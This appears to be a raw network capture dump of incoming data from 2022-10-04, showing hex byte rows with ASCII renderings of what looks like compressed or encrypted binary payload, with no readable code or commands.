                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24072INData Raw: 17 b5 b1 64 3c d9 d5 e4 d9 7f 0f bb b5 47 0c 15 a7 85 d1 c3 e9 8e dc f6 ee bf a6 9f 09 ca 1a 95 cb b0 35 76 5f de 24 b7 0f 74 01 df 97 70 b8 59 5d 55 d6 89 09 a1 3f 41 74 a1 92 99 2b 2c 9e 7e e1 34 10 4f 1a 06 fb 9c cf f0 da bb 67 d1 f6 99 f2 01 8d a4 f0 15 f2 61 bf 7f f0 3c 99 95 2d fb 35 7b b7 0c b4 8f 80 7f a0 9a a3 d5 a5 e9 ff ec 51 4a 5b 16 aa 16 71 35 9c 49 77 86 9d 29 d7 a6 9f 43 99 f3 88 f9 04 19 69 53 f5 89 b6 7c 9b db 9f f3 55 d1 a3 f2 c9 54 01 4e 25 b5 d9 d7 cc f1 fd bb f5 f8 21 b6 54 d2 72 33 0e 78 2d 80 c7 ff 7f 0d 56 29 97 1d ff 4b 1a 04 63 f1 d0 f0 8a 74 1c 0c d9 24 b1 e1 ad 4a dc 2c e2 9b a9 a4 e3 0f 4f 3e 7d 2a a0 47 24 bd 87 05 2b ef a1 05 d1 10 5b ea e8 d4 9c 75 a7 81 46 2d 7a f7 7f 16 bf 5d 0b 1a f4 6a 04 72 93 7b 58 f9 b8 e0 b1 65 9b
                                                                                                                                                                                                                                    Data Ascii: d<G5v_$tpY]U?At+,~4Oga<-5{QJ[q5Iw)CiS|UTN%!Tr3x-V)Kct$J,O>}*G$+[uF-z]jr{Xe
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24088INData Raw: 06 06 52 fc e3 05 73 d5 17 b3 cd 15 1f 39 91 10 9a 0b da 32 05 b7 a9 4e 3e 23 1c df a2 78 2e b4 b6 54 7f f0 6e 31 b1 e0 96 1e b0 58 1b a5 0d 2c 5f 42 e0 37 36 f5 e1 4b 71 98 40 0e 69 b4 30 cd db 63 b0 cd 50 20 04 39 36 43 d9 00 de ca bb 7f 18 0d b7 5e 02 33 15 1b 73 78 25 e8 8f 73 79 03 8f 4b 85 6c 9a 33 fe 8c f4 75 e4 27 3b 7b f3 31 4a b1 a5 b9 6c 86 c9 aa 5f f0 76 7b 10 be 9c 25 ae dc 3c 0c 85 f8 0c 90 82 9a 2c 47 c2 42 4d ef bb 83 2a 9f 79 09 59 32 97 f9 03 ce 3f bd 71 7a 1f bf a2 09 8a ef fa 65 63 34 58 a9 c4 c0 bd 48 ab 82 eb e6 17 29 2e 3b 78 14 16 83 a3 57 fe 6e 25 d6 6b 39 f0 56 73 83 4a f7 9e e8 d4 7b 7a ff 88 f5 4e 5e ff 42 0c e4 5b 4b 42 fd 3f e3 0a a3 fb 3f 48 69 dd 71 8e 8e a8 79 3d 7a bd 38 2b bd 40 ae fc 4a d3 c4 33 de 20 b0 6e 1a 57 d7 d0
                                                                                                                                                                                                                                    Data Ascii: Rs92N>#x.Tn1X,_B76Kq@i0cP 96C^3sx%syKl3u';{1Jl_v{%<,GBM*yY2?qzec4XH).;xWn%k9VsJ{zN^B[KB??Hiqy=z8+@J3 nW
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24104INData Raw: a6 ad 4c 04 b0 15 9a d6 f0 16 2c 58 3f be c3 ee ef 78 cf 16 b2 c8 98 e2 1d 20 17 0e 8b 96 9f 1f 35 4f 1f 8c 54 d3 b4 f3 60 eb 9e bb 4a ba 1a 98 c9 7f 39 c7 5c f5 ff 78 07 78 33 01 d2 9c f2 f5 e0 14 77 ed 20 d9 d3 75 92 4a 04 ac bf 4b ef ed db df 7b db f0 0f 0b f1 7a 55 91 8c 62 c0 e9 1d c5 19 97 41 a6 6c 1e b3 26 bb 97 b3 b2 5e e0 1a 86 5d 62 88 db 5e e2 69 ab c2 8a 18 91 7e 4e e2 25 4a d4 57 7d e7 70 e2 b2 72 24 32 c7 5e 3b 27 93 6a e9 78 97 f3 6f a7 d3 96 57 7d 3b 6a 22 69 e4 e4 68 ac 90 ef 65 ff 56 fe ca 30 c0 b8 c5 b8 7a d8 09 29 e0 ea 75 b2 aa ed 85 d8 8b 19 5e 75 8e 46 d4 a5 2b e6 9a 6f bc b4 3f 96 b7 67 53 ba 09 48 56 a4 09 1e 02 23 15 f4 f1 c8 67 dd 3b 6f 16 e3 8a 47 56 82 20 84 69 08 99 74 2c ce c9 1e 4b c3 f1 37 04 06 c2 48 c4 20 02 54 b2 72 56
                                                                                                                                                                                                                                    Data Ascii: L,X?x 5OT`J9\xx3w uJK{zUbAl&^]b^i~N%JW}pr$2^;'jxoW};j"iheV0z)u^uF+o?gSHV#g;oGV it,K7H TrV
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24120INData Raw: 35 5b 1a c6 1e 32 39 30 cc f9 5c b5 7f 23 9d 48 96 9f 0c 3f 61 bf 4e b5 71 e1 ac bd 41 21 df 5a 05 6e 35 7a 25 0c 97 c9 0c 4b d0 86 7c 40 a1 fd de 99 d5 4e cf 58 09 c2 d1 da 48 62 e5 c3 38 c9 a8 87 17 5a 22 ed 88 2f 8f 4e b4 86 44 8b ee 37 57 88 7d ba 2a a3 55 06 1e 6a b8 4d 4d af 1f 6c 39 0a 67 bc ee 34 2a 91 45 cd d6 81 dd d3 c8 84 36 59 57 69 b6 3e a9 9b 20 78 0b 76 17 b5 a4 e0 98 96 d0 64 91 96 81 05 45 c9 53 06 50 8a 6f 7b a3 de db a4 55 d4 80 39 84 13 c2 a0 1b 5c 65 04 96 a0 2e fd 1c 62 fb b0 b9 9f 4b 43 e4 6d 7a 69 53 92 e7 e0 45 92 96 40 96 05 ee 5d f9 a1 b1 de 73 bb 60 1a 6a 52 f4 5b e7 ca 6f 53 40 ea 97 40 02 51 c7 35 79 87 f2 31 20 71 8e 0d 8f 1c 6b 2a c4 fd bd 39 d7 d8 30 5e e2 ca 72 91 43 bc fa 15 db b2 4c bb 18 55 ac e8 61 a9 20 aa 82 de 03
                                                                                                                                                                                                                                    Data Ascii: 5[290\#H?aNqA!Zn5z%K|@NXHb8Z"/ND7W}*UjMMl9g4*E6YWi> xvdESPo{U9\e.bKCmziSE@]s`jR[oS@@Q5y1 qk*90^rCLUa
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24136INData Raw: 04 31 86 e3 fc 7d 93 a6 87 a2 b2 90 bb 2d 2f be 85 0d 27 0e a5 b6 b7 f1 7a 1a d6 ed 1c 3a 92 9f f8 e1 23 46 8c a9 09 ea 44 5a 0d 08 e0 92 f3 04 59 e2 ae c4 ea 1f b9 c1 48 ab 82 79 7d 0b eb 91 b8 8b 5c 46 0d fe 20 17 60 37 5d a6 5f b0 60 3d 85 e9 bf 69 a5 b9 c7 da e9 80 3e 35 f8 60 4f b6 83 24 96 b6 37 c8 f8 bc 5d 68 1d 52 82 ab 52 e0 d8 ba 2e 11 1b ac ed b8 c7 4c e6 23 20 e6 3b 52 91 cb 3d 45 d2 53 5e 06 ed ee 1c 7a d4 b2 df 35 3c f6 a7 78 04 07 63 02 2d 84 5c 15 b3 39 c5 4a 13 f8 c3 b3 a7 8f c7 2b f3 60 39 66 6a 9f 52 c8 87 17 31 28 8e 82 12 2b bf 85 b2 6b b0 36 89 55 10 4d d1 c7 90 42 c9 70 0c c0 b7 f9 c4 07 b4 70 5c ce 2e a1 49 77 fd 0f 8c 3b 8a e0 20 f3 ba fc 10 f8 d5 68 1f d1 dd 02 96 0b c7 ea 99 d2 e4 7b af 18 bc 46 5e 26 bd ce 9c b9 b7 99 4a f6 90
                                                                                                                                                                                                                                    Data Ascii: 1}-/'z:#FDZYHy}\F `7]_`=i>5`O$7]hRR.L# ;R=ES^z5<xc-\9J+`9fjR1(+k6UMBpp\.Iw; h{F^&J
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24152INData Raw: 68 e5 5d 1c 2a 39 95 8f 2f 70 ec 16 cf 11 d6 31 af cd c8 30 cb 6a 14 6f 9b 33 de 36 7e c8 64 7a cd 83 7b 00 eb 8f 39 37 22 2f 6d e8 d6 e4 a1 d8 b2 4c 8c 90 bc 7d ab 74 a5 88 b2 5f 33 39 d0 f5 14 b3 80 2b 08 51 94 4e 21 d8 29 21 6b 0b 72 9c 0b 36 0a 88 d0 91 98 fd 5f 71 ae 51 fd 67 d1 dd 33 50 82 f1 4b e8 57 cd 6f b3 64 15 5a d3 62 43 e4 59 f2 0f 66 e3 ea b8 c7 20 4b f1 90 fd 53 c6 53 08 93 44 a0 ba 0a 16 cc 5e 4a e8 f4 bd dd 1c e1 38 f5 2a 50 aa 18 9e 6a 78 f2 c9 1d 99 82 e3 ea c4 76 57 76 bd a7 1e 76 5a 11 49 78 fe ed fd 20 49 cc 30 88 29 79 e9 1e 4f cb 3b 2d 7d 0b c9 9d d1 7e 95 75 0b 28 5f 7a f7 6d 8c 43 84 45 15 11 4e e6 dc bf bd 4d 71 56 79 30 f9 d3 b2 cc 7a 7a 72 1e 05 27 c7 d1 ea 45 c4 10 2c 7b 29 70 df c4 75 d1 bd 00 c8 37 b1 b5 90 3b 86 d1 71 7f
                                                                                                                                                                                                                                    Data Ascii: h]*9/p10jo36~dz{97"/mL}t_39+QN!)!kr6_qQg3PKWodZbCYf KSSD^J8*PjxvWvvZIx I0)yO;-}~u(_zmCENMqVy0zzr'E,{)pu7;q
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24168INData Raw: 14 e9 43 59 7d 73 c1 18 f5 fc 49 bf 76 a5 aa 6e 5a c1 f8 82 6e 1b 90 83 5a ce f8 3d 21 16 36 eb 31 5c 5a c0 eb b7 12 74 c4 3d e6 5f 6f 42 ea 25 b9 82 27 f5 87 65 62 39 d0 b1 76 de 7b b2 ab fc e1 08 11 3a 36 2c b5 c7 4c 74 96 21 4f 22 a5 f1 9f 1e 1b 7e 86 ed e5 b0 9a fa 15 d5 dd 09 40 05 84 70 8c aa 44 11 67 78 2a 41 fb bf 49 80 e2 54 a5 bd ab dc c6 17 9e 3d 68 91 d6 53 ae b6 73 84 e1 cf 8f 76 66 ab dd 80 19 fc 71 b3 40 49 d6 8e 8c 57 02 64 6d 54 c8 65 69 27 26 fa 64 e6 14 6b 6d 49 b9 04 86 2e c0 c3 71 19 5d ee b1 a0 8d 63 f1 83 c4 4c 56 7f 01 88 68 d4 d2 14 05 23 f6 25 3d 53 a4 55 51 8a bd 13 5f 68 45 41 51 e7 a2 f7 8a 90 05 57 43 b6 eb 09 27 0f ba 57 88 52 bd 42 1a f0 eb 1f 03 db a3 2b eb a7 4b a5 3f 8e 2e 5b 36 d3 ba a1 fc a4 68 14 b0 65 16 6c 63 17 5e
                                                                                                                                                                                                                                    Data Ascii: CY}sIvnZnZ=!61\Zt=_oB%'eb9v{:6,Lt!O"~@pDgx*AIT=hSsvfq@IWdmTei'&dkmI.q]cLVh#%=SUQ_hEAQWC'WRB+K?.[6helc^
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24184INData Raw: c1 00 0a e7 11 1c 29 aa ee b2 57 8b 2f 6c a9 cd c9 66 a9 85 e7 83 af 0a 47 38 b0 9a ef ca 84 58 0e c4 06 aa 6b 7b 69 51 b5 58 a4 87 8b dd 68 4d 29 a4 e1 ba 70 3c 65 de db 53 7e b8 23 b9 1d 37 3a 1c fe 9c 59 a6 55 56 15 e3 14 7d 22 9d b8 c6 51 5c 2e cb ae 7e 8e 77 39 44 29 47 3e 58 5d 25 06 00 e5 fc 38 9f 8f d2 44 49 b3 74 d1 8f d1 25 15 d8 14 ed 87 89 33 97 8c cd 1d 20 08 13 93 aa 1b 94 04 a3 54 03 ea 9c da 6b eb 30 89 2f d7 11 14 34 3c 8b 43 78 5b 45 21 ca 5d 9e 38 a6 78 49 fb 09 60 9f 13 1d d0 a2 19 63 9f a4 a3 3c 38 3c 63 29 fe 1d 63 cc c7 cb 4b fa a2 ac c9 d6 bf 89 7c 54 7d 41 1e 1f 52 8a 96 36 76 c7 c2 a8 af 28 c4 f1 83 b0 2b e4 5e 1b ee a6 2e ff cf ec 0a f2 03 33 85 71 47 4f 73 fd 86 e6 ae 7f 77 22 ec 0a f6 9d 9f c7 e0 cd d9 b3 d7 88 a6 98 48 64 7b
                                                                                                                                                                                                                                    Data Ascii: )W/lfG8Xk{iQXhM)p<eS~#7:YUV}"Q\.~w9D)G>X]%8DIt%3 Tk0/4<Cx[E!]8xI`c<8<c)cK|T}AR6v(+^.3qGOsw"Hd{
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24200INData Raw: aa b7 c9 b9 0b 29 9f 9d 3b f7 75 2a 83 49 29 c5 29 56 66 81 5b 61 0a 20 e7 e7 18 1d 46 b5 e7 79 9e a7 20 0f 94 34 9b 22 8b 1d d6 fc 70 4d a5 34 f4 06 a5 8f 43 b2 83 98 63 31 30 4a 0b 03 b1 7a 56 86 33 a6 c8 c3 a2 4f 59 48 ff b9 a6 fb ac f9 f5 b7 20 18 82 b5 be b7 e7 8e 48 2d fa 83 75 7b 8a d3 fd 1b 05 6f 17 78 63 39 2d d6 df 5a 24 61 60 8a 40 26 00 96 dc 3c 76 a3 7f 8f 79 26 d6 04 38 39 be e2 40 1b ac ec b7 df 94 a6 d9 ef 13 d2 20 26 68 e2 f0 74 b5 f5 89 26 c5 fe 5f bc 60 a9 ea 8b 80 70 8e 61 1e a6 d7 92 91 6b 50 d6 3f 1e bf 03 77 c7 50 24 1d 33 0f 96 89 46 0e b6 96 6c c2 7d 1e ac 06 63 69 36 3f 19 3b 13 d4 d6 65 bb 9d d9 4d 8a 30 5a 8e 6c e4 5b b6 6f d2 5a 6e 44 53 f6 a1 73 f6 33 2b 2c ad 32 69 0e 84 07 da 46 6a fe cc b1 96 d6 68 9b eb 6c 28 72 48 71 70
                                                                                                                                                                                                                                    Data Ascii: );u*I))Vf[a Fy 4"pM4Cc10JzV3OYH H-u{oxc9-Z$a`@&<vy&89@ &ht&_`pakP?wP$3Fl}ci6?;eM0Zl[oZnDSs3+,2iFjhl(rHqp
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24216INData Raw: f1 93 c4 5e 82 23 fe 82 76 af 89 75 b6 36 08 92 d2 10 6b 6a af 5b 48 92 8c 3e 47 de 75 40 47 a7 d6 fa 54 36 42 d1 47 6b e8 08 1a 9b f1 e6 32 7a f8 86 e3 02 1c b9 6a 1a ec cc b8 fb 09 f7 a3 7e ad f4 21 c7 e8 13 e9 97 7b 34 6c ce b4 df 67 fb b9 e1 5a 41 b7 8f d1 b1 d9 0b 83 be ee 2e c4 bd fc 9d b0 0d 13 24 bf f8 76 56 fc a5 84 6e 38 3b f9 47 3d ef 8f 71 8f 0a 18 5e e6 c4 ac b9 d5 c2 43 bb f6 a7 f4 14 91 fd bc ad 02 a9 55 26 15 0b e9 95 b2 04 26 c3 d1 e3 3a 25 fb c2 09 3c f0 1a ff 14 06 a0 7d 45 d5 7c da 59 ca fb 26 f3 93 5b 2c 9d 74 e0 08 1c de d8 27 72 21 ac ad 0c e8 30 a2 4b ff 8f a3 8b 2b d1 a1 b4 1a 99 49 b3 30 69 04 58 4a bc f5 f0 bb 92 2a 23 e3 c6 a3 c1 1c 7e 3d 52 1d e1 6f e5 62 0d c8 b8 2a a4 6e d7 9e 19 9e ad 7d e0 d2 05 09 4f 1f 08 62 58 6f 6e 87
                                                                                                                                                                                                                                    Data Ascii: ^#vu6kj[H>Gu@GT6BGk2zj~!{4lgZA.$vVn8;G=q^CU&&:%<}E|Y&[,t'r!0K+I0iXJ*#~=Rob*n}ObXon
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24232INData Raw: d8 6a fd b1 c5 14 8b 92 f3 f5 c9 71 b0 10 57 8e cc a9 0a 55 ef 74 e4 80 e6 e5 60 62 6d 41 99 b4 24 90 71 32 dd 89 de 26 77 62 be 1e 6f 63 06 ff 15 54 7c 34 30 c9 fe 76 11 f4 1a 5b 2d ac 49 a4 37 49 6e 01 63 60 06 a5 b6 00 75 b1 f8 71 83 c6 c3 cb 37 54 c2 c1 e2 46 6c 12 68 68 df 86 e7 8c c2 8c 8d 15 99 2c c0 0e a3 70 27 bd 7f c2 d6 19 78 08 bf be 36 1d de 98 2d 84 87 07 0b e1 2e 93 06 7c cf 96 0d 0f d9 10 68 e8 00 00 11 6c d9 72 d0 50 34 03 32 69 06 1f 99 c4 37 59 28 ea cc 81 b2 78 74 2f 87 3e 16 1b d2 c6 70 97 1b 7f a9 9c 7c 93 11 95 c4 9d e2 a8 e1 3d ea bd 33 1b 4c 63 41 8c 3f d4 3b 25 29 43 35 59 08 ef 1c 97 db 91 81 19 1a 7d 68 b6 07 98 eb 68 b1 4d cd 0b 57 a6 63 f3 d9 25 05 07 bc ba 91 bc 9d 53 3c e4 87 55 c6 c5 9d 55 02 b9 52 65 00 da af 48 b0 48 3a
                                                                                                                                                                                                                                    Data Ascii: jqWUt`bmA$q2&wbocT|40v[-I7Inc`uq7TFlhh,p'x6-.|hlrP42i7Y(xt/>p|=3LcA?;%)C5Y}hhMWc%S<UUReHH:
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24248INData Raw: 88 7c 40 c1 71 00 68 cb 5c 75 e7 b9 bf 70 b0 69 83 ba 52 8a d4 54 ef c7 4b 8d 40 20 bc ee 79 27 27 df 7c 69 f5 7d 55 1b 12 2d 47 5f bd ae 87 58 3c 66 e3 89 b7 0b 1c 39 fc 9b ce 0f 60 9c ce 19 e3 32 02 66 fe 06 39 98 ae 90 fc bb 88 3a 70 c9 7f 03 55 76 86 d4 86 a5 05 28 86 28 9b 1b 21 59 a2 aa f6 f2 d9 5b c5 21 e8 64 dc 7e dd 61 66 6b e7 51 77 87 42 bd 88 59 05 fa 7c c2 92 5d 34 f2 5b af 1f 51 53 ca 10 1e 55 71 a4 93 81 67 90 d8 48 67 7f 73 40 69 ea 52 41 8e a8 71 7f 75 9a 59 87 26 a3 e5 a6 b6 0e 09 72 84 c2 29 20 af 1d 5d 4e 98 aa 99 f6 22 f7 c7 52 be 73 a0 3d 39 73 54 5f df 0e ae c0 84 1f 23 f3 bb 32 9c 5a f0 6a d6 5f 41 79 e1 aa 06 ca cd e7 7b 42 92 e4 ee be cf 33 8b 75 7e 7f b4 dc ac cc 5d 90 c4 76 8f f4 23 88 ed 60 63 cf 33 69 82 01 66 c2 04 30 51 ce
                                                                                                                                                                                                                                    Data Ascii: |@qh\upiRTK@ y''|i}U-G_X<f9`2f9:pUv((!Y[!d~afkQwBY|]4[QSUqgHgs@iRAquY&r) ]N"Rs=9sT_#2Zj_Ay{B3u~]v#`c3if0Q
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24264INData Raw: f5 fc 7a 48 af ed 79 c4 3e 8a e4 32 50 bb f7 5f 6d 0c a0 47 f7 dc d7 59 64 3e 63 99 0a 18 5d e2 68 3d b6 53 37 6f 10 e3 f4 b1 14 49 61 9f b3 47 9f 4b d8 5e 29 72 e4 b4 a2 e2 57 3e 91 ea 57 1b 5f 79 cd b3 d1 ab 62 ce 67 f6 5e 96 6d 94 44 d6 8c 0a 7d 18 58 5f 56 91 df ee 3d e3 87 27 51 f7 b7 41 25 be 5c 39 6d 0c 57 4d 13 38 92 22 71 e5 65 3a 0f a6 86 92 90 7a c5 b5 3f fc bc e8 60 d2 7a 68 29 53 2d b5 cc 1b 63 ea f9 28 95 cc 20 4c 2a 15 04 41 84 f1 2c 47 57 8e 8a 0e 15 f5 89 84 69 13 6d 2f 14 ff f7 ce e0 88 2a 83 ec ff 40 01 b1 de ed 70 74 43 99 6b 4e fc 43 f1 40 66 9a a2 ad 78 22 7a be e1 f7 9e 96 0d 45 14 ec fc 2e 71 9a e2 3e 84 89 1a 83 0e 09 bf aa 5e 74 a0 d6 e4 7a 08 21 19 c4 e4 eb ad b9 1a 38 b6 83 4d f0 5c ad e4 c9 d2 7d 56 26 c2 95 e0 d1 f5 9c 70 41
                                                                                                                                                                                                                                    Data Ascii: zHy>2P_mGYd>c]h=S7oIaGK^)rW>W_ybg^mD}X_V='QA%\9mWM8"qe:z?`zh)S-c( L*A,GWim/*@ptCkNC@fx"zE.q>^tz!8M\}V&pA
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24280INData Raw: bb f1 06 56 ea 8e b6 0f 95 c6 36 2a cf 33 7c 59 46 27 e0 e6 1b c2 23 03 92 fd ab c0 b0 46 28 fe e8 90 4f 86 24 60 b1 fc f9 0d 30 35 72 93 d7 ca 52 85 95 2b 4d 66 ab 53 5e fa 15 f2 d6 de e7 a9 0f 72 c6 ab 7b 67 e0 9f d8 97 4d fd 60 35 3b 34 0d 05 08 39 1c aa 57 fa 51 af de d3 23 94 b3 cf da ba 2d 23 61 14 b9 89 72 93 87 65 6d c4 c1 34 98 5d a4 96 da 75 7a 96 71 2b 48 c0 a5 94 bb ae ad 7f 08 a6 5f d8 56 19 1c 79 c6 45 f8 1e 10 dd 3d 59 0b 00 e3 bb 10 ec 6f 18 8b d4 f5 c3 47 9b a5 c2 a1 14 ef ca ed 60 ed a6 a1 13 fd a1 21 b4 db 02 a1 13 21 e6 6c 1a dd 50 76 b5 94 af fd d0 e6 7e a2 2f 75 0d 7e 7f 26 89 ad ed 95 f7 2b e4 26 86 e0 59 f5 c2 ed 6a d1 62 4b e6 6c fc a6 8d 83 8e c2 06 4b f9 a1 a4 c1 80 7c b8 c2 ee 00 34 61 cd 62 c5 ca 2c 82 54 f8 7c c3 7e 38 2e 71
                                                                                                                                                                                                                                    Data Ascii: V6*3|YF'#F(O$`05rR+MfS^r{gM`5;49WQ#-#arem4]uzq+H_VyE=YoG`!!lPv~/u~&+&YjbKlK|4ab,T|~8.q
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24296INData Raw: 02 e4 7e 8b 7b 1c 4d 95 9f 6a 9b 97 25 e8 6d 26 ed bb 14 5c 1b 7f 2b 4d 11 e9 1f fd 8d 92 68 a6 0a 9a e7 14 46 6c d2 89 70 7f dc c6 2c 1a bc 6f 4e 38 a0 5f 8e ff 16 ca 07 f1 71 b7 7d 0c da 00 72 f9 99 ad 76 86 3e 6d 1f fe 31 fc 01 b1 2c 22 99 e5 2b 52 e6 fc a6 b9 ab 22 2a 17 b6 7e 59 a3 36 ab 9b 5a de 0d 79 e0 29 c6 23 9e 91 4b 9f db 61 3a 15 95 64 ab 7d 8c 67 7b 9d 85 34 43 b8 d1 9b 2c f6 06 2d 81 09 73 6a 84 e8 46 36 cf 78 8a 26 1f 34 eb a9 03 7b aa b6 e2 d2 76 08 25 05 ea e3 a4 0b b2 b3 9e 36 ea 84 57 68 33 fd b3 ab 05 d7 84 4b ad 4b af 07 ac 2d f3 b4 ab b3 9a 4a 54 9c b3 9e ea 96 d0 aa 4c ce 2b cf 57 b1 d1 b9 80 11 08 43 08 5b 0e e2 37 90 cf 64 d4 44 d3 cb 2b be 90 9c 24 59 ff 57 22 0d c1 06 9a ed 83 b8 35 aa e8 0a cb 3d 3f ed ad 39 c4 ff 55 98 ea 5b
                                                                                                                                                                                                                                    Data Ascii: ~{Mj%m&\+MhFlp,oN8_q}rv>m1,"+R"*~Y6Zy)#Ka:d}g{4C,-sjF6x&4{v%6Wh3KK-JTL+WC[7dD+$YW"5=?9U[
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24312INData Raw: 94 f8 75 c9 ed ef e9 7f ce 15 53 5e 02 07 50 b5 28 16 69 ff ae b5 a4 3a 21 81 e3 5f 27 88 12 b5 3b b7 5b b4 9d 01 c1 66 eb e2 2d f6 1b b4 bd ab aa 94 93 b6 e7 9a 66 9d d6 c8 ab 97 67 53 8c 69 8f 6e 38 d8 35 6c 1f 49 d5 f6 ef a0 29 f8 d8 34 16 74 2a e2 ff 86 0c 44 c3 57 63 6f 0a 92 fe 7b 0a 55 47 ee 68 68 7e 99 8e 6c 48 fc a9 13 83 20 21 96 8c 5d 2c aa de 1d 61 78 9d c9 77 22 07 46 ab cc 81 5f 67 80 cf 68 19 99 5f d4 6a ee 20 83 94 48 e4 72 d4 66 75 46 66 c6 d5 69 0c 8a b4 ec ed d8 fa cb 2b 5b bb 9b 62 24 6e 8f f9 3c e0 53 aa 0b d9 0f 4f 25 37 3a e9 86 1c 0f 40 18 da 4a f1 f8 06 53 2a 16 00 8d d6 9f a0 4f be 85 b1 af 6d 0c e6 69 d4 aa be 37 86 df af a9 8c 65 44 5d f9 2f fc 76 f9 98 92 7f a6 71 c2 f2 04 3a e4 ec 1f 63 c2 96 81 81 63 52 c9 c7 81 e8 23 5f 22
                                                                                                                                                                                                                                    Data Ascii: uS^P(i:!_';[f-fgSin85lI)4t*DWco{UGhh~lH !],axw"F_gh_j HrfuFfi+[b$n<SO%7:@JS*Omi7eD]/vq:ccR#_"
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24328INData Raw: 89 e7 85 0e 43 2f af 0f d8 0e 97 b6 26 eb 5e 61 3f 6a c8 9e ff ae 4f cd 8d 3c 57 72 b3 5a 2f 1d 95 bb a9 3f f3 2d da 3e d8 2b ec fe 3a 05 12 de 9f ca 27 8a 29 8a ef 53 60 bb 45 e1 fd 34 05 0b e8 56 cb 0c 67 63 12 14 e3 8b 49 b7 01 b2 07 09 75 59 14 38 92 00 31 a3 75 5f e7 d7 4f 4c 92 f4 7f 29 22 74 d4 88 20 88 ef 9d 27 52 dc 90 20 1f bd a1 77 80 81 9c 40 d5 a7 03 b7 b1 5e 6b 76 24 5d d0 98 ae f7 7a 08 d9 ca a7 a4 88 f5 92 74 87 6d a0 2b 5c 9e 80 e2 56 7e 30 62 3c 82 f9 fe e4 54 d4 69 31 82 2d 17 f5 3e 90 aa 46 96 94 04 99 6e af f7 d3 92 bb eb da b5 9f 0b d7 14 ec 38 14 c7 06 39 ec 7b f2 79 1c 29 6b 32 42 08 e2 97 62 dd b7 f9 a9 58 79 b4 58 a6 81 e4 b4 57 81 a8 f6 c2 d7 95 4e 2c 20 85 05 ab 90 72 97 df 2f a0 e4 ad b2 4d 42 74 aa 67 89 c5 cb db 23 e5 b5 5e
                                                                                                                                                                                                                                    Data Ascii: C/&^a?jO<WrZ/?->+:')S`E4VgcIuY81u_OL)"t 'R w@^kv$]ztm+\V~0b<Ti1->Fn89{y)k2BbXyXWN, r/MBtg#^
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24344INData Raw: af a9 de 22 d1 6b b7 37 6f 84 33 bb 42 f0 dd 2f 32 e4 1b 03 f7 42 6b 88 48 7b 92 ae e0 2d 83 ff 7c 6a 17 2b 7f f4 a4 25 c8 59 d9 49 54 b6 c7 33 57 67 33 a4 da a1 e1 a1 75 ba 09 6f 7c 8d d5 82 07 17 66 2f c5 c7 2b ac 46 7e e4 e0 72 4f bb 41 4d 8e 5a d3 fc 3e 2a ae 76 10 36 51 64 da 33 28 e9 0a b6 80 bc 40 87 ec 8d 7f b5 86 65 36 0f 20 45 37 50 c7 25 c1 75 48 7f fb 35 bd 37 3e ed 22 6e 91 60 09 99 c8 15 30 85 36 72 b2 7f fe f4 96 35 90 aa 41 07 08 19 ab bc 20 17 2c 0c 27 ab 46 38 76 94 1f 79 bf 4a 1a a9 86 a5 4f 7c 9b 87 f6 61 30 09 54 68 aa 82 1c c0 1e f8 09 e1 5c 62 6e f7 84 a3 ff e9 ff 32 05 e6 b4 1e f8 a9 80 f0 2c 07 31 fe b1 40 5c 69 31 9e 45 07 6d f9 c3 8e 1a 6a ed 41 f9 59 85 75 73 57 f9 33 96 b2 6d e0 db a4 af bf 4a f7 4f 22 c9 c8 39 03 a7 f9 a2 a5
                                                                                                                                                                                                                                    Data Ascii: "k7o3B/2BkH{-|j+%YIT3Wg3uo|f/+F~rOAMZ>*v6Qd3(@e6 E7P%uH57>"n`06r5A ,'F8vyJO|a0Th\bn2,1@\i1EmjAYusW3mJO"9
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24360INData Raw: f6 d7 20 46 57 2f f9 6c fa c5 32 35 07 22 8e ab b8 2c d7 f4 80 08 ba fb d6 f5 40 b6 82 58 b7 50 9b 2c 3e e0 17 07 08 fb 2d 03 dd 76 11 26 77 6e 71 d5 17 f7 f0 3c 36 ec 33 2d 58 76 f9 70 b1 82 72 cb ee 5a 46 27 75 0c fd 24 48 86 e0 d9 d2 7f 5f a2 13 55 62 dd 61 73 7f 46 7a ca 77 5e fd 46 38 40 93 ef 05 6e a0 3a 7e 9a 4a 13 28 9c b7 05 da 06 e9 11 e4 81 0a b2 94 f8 1b 9e 31 06 06 ca 2f a7 b5 d3 30 18 23 df 99 a0 e7 6a 65 44 79 d6 10 c0 e9 5c a2 0b 02 2d 38 32 59 d6 de 09 68 5d cc b3 5d d1 80 9c e9 4b 4d 26 38 07 55 f8 01 3d d4 3a 21 71 b7 da 3d e7 5c 2f 38 b6 65 70 6d 6f 13 5b ba ae 85 6c f9 0a da 15 e7 ab 36 d0 b6 a2 ec 1d bf a2 ea e8 5a 9a bd 0c a0 13 7c 2e c7 a8 97 8d f9 51 37 57 84 dd 8b 1e 9e 6a 0e d8 94 5a 83 d2 47 f9 09 d1 ce 1a 4c b3 62 2f 72 7b 19
                                                                                                                                                                                                                                    Data Ascii: FW/l25",@XP,>-v&wnq<63-XvprZF'u$H_UbasFzw^F8@n:~J(1/0#jeDy\-82Yh]]KM&8U=:!q=\/8epmo[l6Z|.Q7WjZGLb/r{
